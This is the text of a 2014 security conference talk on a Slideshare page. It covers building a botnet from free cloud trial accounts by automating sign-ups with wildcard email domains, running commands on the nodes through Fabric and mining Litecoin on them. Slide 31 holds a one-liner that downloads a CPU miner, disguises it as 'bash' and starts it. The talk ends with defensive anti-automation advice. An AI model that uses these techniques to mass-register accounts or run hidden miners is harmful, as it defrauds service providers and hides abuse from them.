CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

2,170
-1

Published on

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service.

We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares!

While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,170
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
55
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

  1. 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  2. 2. 2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
  3. 3. 3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  4. 4. 4 Platform as a Service Cloud PaaS
  5. 5. 5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
  6. 6. 6 Development Environment as a Service Free Cloud Services
  7. 7. AUTOMATION Scripting the Cloud
  8. 8. 8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
  9. 9. 9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  10. 10. 10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
  11. 11. 11
  12. 12. 12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  13. 13. local-part@domain.tld Email Address Anatomy
  14. 14. 14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  15. 15. 15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  16. 16. 16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
  17. 17. 17 Unlimited email addresses Free DNS Subdomains
  18. 18. 18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
  19. 19. 19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
  20. 20. 20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  21. 21. 21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  22. 22. DEMONSTRATION Automatic Account Creation
  23. 23. 23 Automated Registration Workflow Email Addresses
  24. 24. 24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
  25. 25. FUNTIVITIES Botnets Are Fun!
  26. 26. 26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
  27. 27. 27 Refer Fake Friends Unlimited Storage Space
  28. 28. 28 Refer Fake Friends Unlimited Storage Space
  29. 29. 29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
  30. 30. 30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  31. 31. 31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
  32. 32. 32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  33. 33. 33 All your processors are belong to us Litecoin Mining
  34. 34. CLOUD BREAKOUT Bypassing Restrictions
  35. 35. DETECTION No one can catch a ninja!
  36. 36. 36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
  37. 37. RISING TREAD Active Attacks
  38. 38. 38 Adaptation Cloud Provider Registration
  39. 39. 39 Adaptation Cloud Provider Registration
  40. 40. 40 Adaptation Cloud Provider Registration
  41. 41. 41 Crypto Coins & DDoS Clouds Under Siege
  42. 42. 42 Crypto Coins & DDoS Clouds Under Siege
  43. 43. PROTECTION Bot Busters
  44. 44. 44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  45. 45. 45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  46. 46. 46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  47. 47. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM

×